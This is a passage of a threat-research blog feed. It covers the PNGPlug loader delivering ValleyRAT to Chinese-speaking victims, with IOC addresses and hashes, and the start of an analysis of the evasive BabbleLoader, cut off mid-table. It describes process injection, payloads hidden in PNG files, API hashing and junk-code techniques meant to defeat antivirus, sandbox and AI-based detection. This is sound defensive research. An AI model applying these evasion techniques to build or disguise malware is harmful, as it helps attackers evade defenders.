&lt;a href="#role-of-the-pngplug-loader" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The primary function of the loader (&lt;code&gt;libcef.dll&lt;/code&gt;) is to set up the environment
for malware execution via the following steps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Patching ntdll.dll: Enables memory injection.&lt;/li&gt;
&lt;li&gt;Command-line Argument Parsing:
&lt;ul&gt;
&lt;li&gt;If the &lt;code&gt;/aut&lt;/code&gt; argument is present, the loader decrypts the registry path
&lt;code&gt;Software\\DICKEXEPATH&lt;/code&gt; using XOR encryption and writes the down.exe path
to the registry (&lt;code&gt;HKEY_CURRENT_USER\Software\DICKEXEPATH&lt;/code&gt;). The loader then
uses the
&lt;a href="https://github.com/hasherezade/pe_to_shellcode/tree/a2458c96619b721677af0f9b906cd6a229364b4c"target="_blank" rel="noopener"&gt;pe_to_shellcode&lt;/a&gt;
injection method to inject the contents of aut.png into memory.
(&lt;a href="https://bbs.kanxue.com/thread-284691.htm"target="_blank" rel="noopener"&gt;For more information about this injected payload, refer to this report.&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;If &lt;code&gt;/aut&lt;/code&gt; is absent, the loader runs &lt;code&gt;down.exe&lt;/code&gt; with the argument and
continues its checks.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Anti-Virus Detection: The loader searches for the presence of 360 Total
Security by checking the path &lt;code&gt;C:\Program Files (x86)\360\360Safeuninst.exe&lt;/code&gt;.
If absent, the loader maps &lt;code&gt;view.png&lt;/code&gt; into memory and creates a new process
(&lt;code&gt;colorcpl.exe&lt;/code&gt;), injecting the contents of &lt;code&gt;view.png&lt;/code&gt;. During
investigations, the process was executing ValleyRAT malware.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The use of .png file extensions for malicious payloads is a key stealth tactic
and inspired the name &lt;strong&gt;PNGPlug&lt;/strong&gt;. As shown in the screenshots below, these PNG
files contain additional data, specifically PE executables, embedded at
specific offsets. This data is loaded and injected into the process as
described earlier, further enhancing the malware’s ability to evade detection
while executing its payload.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/01/weaponized-software-targets-chinese/images/fig1.png" title="Binwalk output for one of the PNG files used by the loader, demonstrating that it has a Windows executable (PE) at offset 0x2AB9E." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Binwalk output for one of the PNG files used by the loader, demonstrating that it has a Windows executable (PE) at offset 0x2AB9E.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2025/01/weaponized-software-targets-chinese/images/fig2.png" title="A function in the loader that handles the mapping of the PNG file into the memory. Specifically, it looks for the data that begins at offset 0x2AB9E in the PNG file." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;A function in the loader that handles the mapping of the PNG file into the memory. Specifically, it looks for the data that begins at offset 0x2AB9E in the PNG file.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;ValleyRAT Details&lt;span class="hx:absolute hx:-mt-20" id="valleyrat-details"&gt;&lt;/span&gt;
&lt;a href="#valleyrat-details" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;ValleyRAT is a sophisticated, multi-stage malware attributed to the Silver Fox
APT. It employs advanced techniques such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Shellcode Execution: Running components directly in memory to reduce its file
footprint and evade detection.&lt;/li&gt;
&lt;li&gt;Obfuscation and Privilege Escalation: Hiding malicious activities and gaining
elevated access.&lt;/li&gt;
&lt;li&gt;Persistence Mechanisms: Leveraging scheduled tasks and registry modifications
to maintain control over infected systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The malware’s stages include initial execution, deployment of obfuscated
shellcode, and a loader module that fetches additional malicious components
from its command-and-control (C2) server.&lt;/p&gt;
&lt;h2&gt;Attribution&lt;span class="hx:absolute hx:-mt-20" id="attribution"&gt;&lt;/span&gt;
&lt;a href="#attribution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;a href="https://www.fortinet.com/blog/threat-research/valleyrat-campaign-targeting-chinese-speakers#:~:text=This%20relatively%20new%20RAT%20is%20attributed%20to%20the%20suspected%20APT%20group%20%E2%80%9CSilver%20Fox%E2%80%9D."target="_blank" rel="noopener"&gt;Evidence links this campaign to the Silver Fox APT&lt;/a&gt;,
a group known for espionage and cybercrime campaigns targeting Chinese-speaking
individuals and organizations. Their tactics include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Phishing Techniques: Using trojanized files and SEO-optimized phishing sites.&lt;/li&gt;
&lt;li&gt;Espionage Tools: Deploying malware like ValleyRAT and Gh0st RAT to monitor
user activities, deliver plugins, and potentially install additional
payloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Based on victimology, infection vectors, and observed payloads, we attribute
this campaign to Silver Fox with high confidence. Their operations underscore
the need for robust cybersecurity measures to counter evolving threats from
sophisticated actors.&lt;/p&gt;
&lt;h2&gt;What’s Interesting?&lt;span class="hx:absolute hx:-mt-20" id="whats-interesting"&gt;&lt;/span&gt;
&lt;a href="#whats-interesting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;This campaign stands out due to its unique focus on Chinese-speaking victims
and organizations across China, Hong Kong, and Taiwan. It demonstrates an
attack that broadly targets one specific demographic—the Chinese-speaking.
Interestingly, despite their well-documented disputes and distinct political
landscapes, the attackers are treating these regions as a unified target. This
differs from the conventional perspective within the security community, which
often considers them separately when analyzing threats.&lt;/p&gt;
&lt;p&gt;Another notable aspect of these attacks is the potential operational gaps
within these organizations, particularly the lack of investment in employee
tools among some larger companies. This oversight frequently forces employees
to rely on free software, inadvertently increasing their vulnerability to
malicious campaigns.&lt;/p&gt;
&lt;p&gt;Equally striking is the attackers’ sophisticated use of legitimate software as
a delivery mechanism for malware, seamlessly blending malicious activities with
seemingly benign applications. The adaptability of the PNGPlug loader further
elevates the threat, as its modular design allows it to be tailored for
multiple campaigns. This flexibility underscores the evolving nature of the
threat landscape, emphasizing the urgent need for advanced detection and
prevention mechanisms to counter these stealthy and persistent attacks.&lt;/p&gt;
&lt;h2&gt;IOCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;code&gt;156.247.33[.]53&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;08dad42da5aba6ef48fca27c783f78f06ab9ea7a933420e4b6b21e12e550dd7d&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;33bc111238a0c6f10f6fe3288b5d4efe246c20efd8d85b4fe88f7d602d70738e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;50a64e97c6a5417023f3561f33291b448ce830a4d99c40356af67301c8fa7523&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6d4dd4334791c91bb09e7a91dd5c450b2c6e3348a5586de011c54ce3f473f619&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;76fc76dc651c3cc9d766a6ad8a90f605326463bc4cb2f8f053d44dfbc913beee&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ad23f5c9bab137dc24343fc410f7587885aab6772dee5e75a216ed579c6ee420&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c497506fe2df57c39fcf92398f4864ca4bfcb1a6f2f80c3c520166bc61882855&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;e49b085f5484531395b5a7903f004b2a02a2b4ebfa46116d1a665ba881b1f528&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c636120749b49f47fc8d42409ead6c51ea44bc40c815370997ca63f48acdf002&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;79acdca5247ca9719f2f3a34c7942cd60b209f7b616efa5dd81e6656a8baf9a5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;70facc8ad5db172e235b4cc720a0edaedd4470b8a6ec5da8dee2758f4a1aafef&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;e9e4751c88d3a1a4bfdd5d07bb35636787b0d6fbf68b17642d3fe03cbe5ebf70&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;de8a0da702a491f610b9e85050d8641cadf4ed84edf4d151f94335b0d78d6636&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;6d2a4d9e2fc6e4dac2c426851b4bdf86dd63a5515d8d853e622a0bc01d250ce9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4a68bdfa3e31a8c063bbf94469160eb7998a556027d5ad33f37c347a71c2d3a4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7c31c4d0308fb1d67f6af48a76138a9db19f494c1e9a12debdcca7382ad5418c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;5f9a5ad43a9f79976cd7014ce072429ef2edbae872b4226372cfb07d8a86b8a5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3ac3ca18142a935608cb0d2c8d6421ebb9abc30bce93f094447b9c3f63fe791b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9d97f3f55bc647911e14a36c83f263e91662cf9d13a2fc3ec7c92dedb8977d37&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;c070749f95aeeefcd1c3a875c1b8e77b57cad0c8338436af9a3c9e1323fd4e11&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7eaed6fa867875119c3ebb40aa24716d91fdbccb2106fa4708ff0637920a920c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fa26722e99763a29af160fae64183a47a57362b666753624b78e954c8cde0525&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9aa51d1c82fdbc8f0f27340180bd40faa7e76b8ac6d204b2d3548cfd0897d805&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;58416315c61ed5cb2c754244ed5c081963dabf3e698b04226a00f978cd913e84&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;f2f96e5ac1b4bd6cac49c71ca2010dcbe5751757483520cfc7dddf4fb7186044&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;45.195.148[.]107&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;46af73560cafff5c8bbc16980d01641af0de3b689bc248dfb52afcf3a8a76a55&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;7bff2404c2816c4e1576d449820f01e3f46e7c972beb1843e3b8da2e065f8dc3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;94ff4679dd5aec7874354c14132701ecdfbbb558c6011e4952d13bf843255529&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Ae6d88ea99e530f778ee6088862b50dfb6e8bb45857211e9105428c57c2a7b4a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9aea0fdfead2e956bc0b4574c2b4cb2855dd9df6a5fd61d350f3285d249adfca&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;First stage of the loader:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;c5d5054047a12efc68a67abd8f15069a853dd09800cd39d68df5a27702b45334&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;a97371df7d51fe0aee1d54b5b233a1713f69224802b1da35337a3041788990e6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4b6bf40dc331c89e416ef012a6dc4f55c83136197be7115246b42e4f7a828baa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;30147b6691e5bc1a15c76cebf81b2de77d9099e8200b6ed9742c6e3b36505f34&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;9bd53057c8905d508374698e2595301f0be1529ec4ebfa71c09ad0c01a562982&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;4d64c2d1ae0de0f3066a6c020ab7aa5a9dd487c0cf1ff1ca2e93d98ff30e039f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;99fb7a40dbf6a042bcb77f67a5a76fe03ec3c6820ac5e15cb009795d545152ea&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d9e939f904a1cddf5fb8ffba14acbfe227ed5dfc4990b52a44d4dfd0baa6de4e&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0b33f08bc2917c4825c053754fc88e16b35d1a8fff4135595b265a4c6f850250&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cd347b9f558cf024df1dbb62ed7a0d72a2edc04b1330058cfa1baf4fc3894e03&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;8aa28f35dbafc18a37b07fd15bb599e3c8de5b692117f1c6fd491bd03028a423&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d51db234d0236cd0dbfcf13adc33387f10920011537815d188eff012872e30be&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;d0ce85ec31053478c67e4f53ca2ef9b7b1f0fda74621c9c7c8c1612772ca778c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;504d7714419931f80b734e212a9431ec98887c56ade8966c4d7cae58b28d49ca&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;16bb3968e1112b63fef8a4e7bda9d021dfef6fd1955fdfa677545535a14a65b4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;659ede632d3bfc28d143c144fdba34d08b21c4f97ce6c9dc1fcd4d2bf5cc25e3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;463c9704fb009cd13e0ef50fa7d5035aa5f35b4841fe75ecab5c4a276601f837&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;3fc35cab1272f769af309cb46375e21680f13d629181c7646cb0cf2c9b2e72e7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;517b43bf057877727387316d8538dc07599856eb428d43f512e89964a5dfb331&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;e54ce9939679c691dc5719e309a8d541183b6672269fd61013109ef0d8509b1e&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Babble Babble Babble Babble Babble Babble BabbleLoader</title><link>https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/</link><pubDate>Sun, 17 Nov 2024 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/</guid><description>
&lt;h2&gt;Loaders, an Ever Evolving Market&lt;span class="hx:absolute hx:-mt-20" id="loaders-an-ever-evolving-market"&gt;&lt;/span&gt;
&lt;a href="#loaders-an-ever-evolving-market" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The pace of innovation and development in the malware detection market is
relentless, the same goes for the development of malware itself. Constantly
charging and adapting to create ever more evasive and capable payloads.&lt;/p&gt;
&lt;p&gt;One such sector of this market is the loader (also called crypter or packer)
market. In today’s threat landscape, loaders have become a critical tool in
cybercrime operations, serving as the backbone for delivering a range of
malicious payloads. Loaders are often the first stage in an attack chain,
designed to stealthily execute or inject malware, such as info-stealers or
ransomware, into a target system. Their prevalence reflects an evolution in
tactics, allowing threat actors to evade traditional antivirus defenses through
techniques like in-memory execution and anti-analysis features. Widely
available for purchase or lease on underground markets, loaders are now a
commodity in malware distribution, making sophisticated attack methods
accessible to a broader range of actors and adaptable across diverse campaigns
and targets.&lt;/p&gt;
&lt;p&gt;In this blog, we will introduce “BabbleLoader”, an extremely evasive loader,
packed with defensive mechanisms, that is designed to bypass antivirus and
sandbox environments to deliver stealers into memory.&lt;/p&gt;
&lt;h2&gt;BabbleLoader’s Techniques to Evade Traditional and AI Systems&lt;span class="hx:absolute hx:-mt-20" id="babbleloaders-techniques-to-evade-traditional-and-ai-systems"&gt;&lt;/span&gt;
&lt;a href="#babbleloaders-techniques-to-evade-traditional-and-ai-systems" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;BabbleLoader stands out for its array of sophisticated evasion techniques that
challenge &lt;strong&gt;both traditional and AI-based detection systems&lt;/strong&gt;. Key features
include junk code insertion and metamorphic transformations, which alter the
loader’s structure and flow, effectively evading signature-based, Artificial
Intelligence, and behavioral detections. Through dynamic API resolution, the
loader sidesteps common API monitoring by resolving necessary functions only at
runtime, preventing static analysis from identifying telltale Windows APIs.
Also bypassing sandbox injected DLLs that hook API calls. Shellcode loading and
decryption further obfuscate the payload by embedding and decrypting malicious
code in memory, bypassing file-based scanning. Additionally, anti-sandboxing
and anti-analysis measures detect virtual environments, impeding sandbox
analysis and automated AI defenses. Together, these techniques make this loader
a versatile tool, capable of subverting both static and dynamic security
layers.&lt;/p&gt;
&lt;p&gt;When investigating this loader, we have seen it used across multiple campaigns,
targeting both English and Russian speaking individuals. Lure themes suggest it
is targeting a vast range of users, from users looking to download generic
cracked software, such as video editing, gaming, VPN, browsers, and utilities.
We have also noticed campaigns that target with a particular focus on business
professionals in finance and administration, masquerading as accounting
software, and forms for filling out eligibility checks often used by HR or
payroll professionals.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The sample used in this analysis is:
&lt;code&gt;a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Junk Code/Metamorphism&lt;span class="hx:absolute hx:-mt-20" id="junk-codemetamorphism"&gt;&lt;/span&gt;
&lt;a href="#junk-codemetamorphism" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;BabbleLoader makes diabolical use of junk code. This is done in an effort to
hamper analysis by confusing the analyst. This is achieved through multiple
means. There are many paths of code that are never actually accessed, but use
random imports with randomly generated hardcoded strings.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig1.png" title="Junk Code making rubbish calls" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Junk Code making rubbish calls&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The loader also makes excessive use of random instructions, adding values to
local variables and moving data around registers for no particular
functionality.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig2.png" title="Junk Code" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Junk Code&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The amount of junk code added into the sample greatly increases the amount of
code to the point where it starts to crash disassembly or decompilation tools
through its sheer mass alone. In the case of IDA needs to collapse nodes due to
them being so large.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig3.png" title="Collapsed Node in IDA" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Collapsed Node in IDA&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;In Ghidra the function graph view will freeze and there are too many
instructions for the decompiler to show.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig4.png" title="Decompilation output in Ghidra" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decompilation output in Ghidra&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We have even checked in Binary Ninja to see the effects of the junk code. The
user is required to manually force analysis of the function due to the size.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig5.png" title="Binary Ninja showing large function" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Binary Ninja showing large function&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Each of these techniques also serve the purpose of making the loader
metamorphic. Each build of the loader will have unique strings, unique
metadata, unique code, unique hashes, unique encryption, and a unique control
flow. Each sample is structurally unique with only a few snippets of shared
code. Below is a very small snippet of the main method of two different
samples, showing very different control flow.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig6.png" title="Comparison of structure of two BabbleLoader samples" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Comparison of structure of two BabbleLoader samples&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Even the metadata of the file is randomized for each sample.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig7.png" title="Junk Metadata" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Junk Metadata&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;What This Means for AI-Based Analysis Techniques&lt;span class="hx:absolute hx:-mt-20" id="what-this-means-for-ai-based-analysis-techniques"&gt;&lt;/span&gt;
&lt;a href="#what-this-means-for-ai-based-analysis-techniques" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;These techniques also have large implications for AI based analysis techniques.
This constant variation in code structure forces AI models to continuously
re-learn what to look for—a process that often leads to missed detections or
false positives. By filling the code with junk instructions, the loader can
trick AI into interpreting irrelevant actions as meaningful ones, leading it to
predict that the malware will perform operations that it never actually
executes. Junk code also generates a large volume of “noise” in the program
flow, overwhelming the AI’s pattern-recognition capabilities and forcing it to
sift through thousands of extraneous actions that mask the true behavior of the
malware.&lt;/p&gt;
&lt;p&gt;Additionally, the inclusion of countless junk variables adds another layer of
complexity. AI models analyzing variable behavior to understand data flow must
now track thousands of decoy variables, each potentially obfuscated or
dynamically transformed to further confuse the analysis. This variable noise,
combined with the ever-shifting structure from metamorphism, makes it extremely
difficult for AI to reliably determine which variables are integral to the
malware’s function and which are simply junk.&lt;/p&gt;
&lt;p&gt;The sheer volume of junk code and variables also makes analyzing this loader
exceptionally costly. The sheer number of tokens AI must process to parse and
interpret the junk alone leads to high computational and financial costs,
effectively weaponizing the malware’s complexity against AI-driven defenses.
This combination of overwhelming data volume, misleading patterns, and high
processing requirements creates significant challenges in detecting and
analyzing the malware accurately.&lt;/p&gt;
&lt;h3&gt;Dynamic API Resolution&lt;span class="hx:absolute hx:-mt-20" id="dynamic-api-resolution"&gt;&lt;/span&gt;
&lt;a href="#dynamic-api-resolution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;One of the first operations of the loader is to start the process of
dynamically resolving API calls. It will achieve this through
&lt;a href="https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware"target="_blank" rel="noopener"&gt;API hashing&lt;/a&gt;.
It will first get a module handle for &lt;code&gt;ntdll.dll&lt;/code&gt;. The string for the DLL is
decrypted using a rolling XOR cipher.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig8.png" title="Decoding of NTDLL string" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Decoding of NTDLL string&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Using the returned handle, the loader will start to read the PE header of
ntdll.dll and it will locate the export directory and start parsing out values
that it will need to dynamically resolve the functions by hash. The loader
builds up the following struct.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c" data-lang="c"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;_NtDllExportInfo&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;AddressOfFunctions&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;AddressOfNames&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;AddressOfNameOrdinals&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;NumberOfNames&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;HMODULE&lt;/span&gt; &lt;span class="n"&gt;NtdllModuleHandle&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The parsed values can be seen easily from viewing the export directory in CFF
explorer.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig9.png" title="Parsed fields shown in CFF Explorer" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Parsed fields shown in CFF Explorer&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once the struct has been built up, it can then proceed to iterate through the
export names, hashing the names to compare to hardcoded values in the binary.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2024/11/babble-babble-babble-babble-babble-babble-babbleloader/images/fig10.png" title="Resolution of functions by hash" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Resolution of functions by hash&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The following calls are resolved, getting pointers for imports. Whilst the
exports will remain the same for each build of the malware, the hashing will be
unique per each build.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;Call&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1ABEC790&lt;/td&gt;
&lt;td&gt;NtCreateSection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;993C0058&lt;/td&gt;
&lt;td&gt;NtMapViewOfSection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
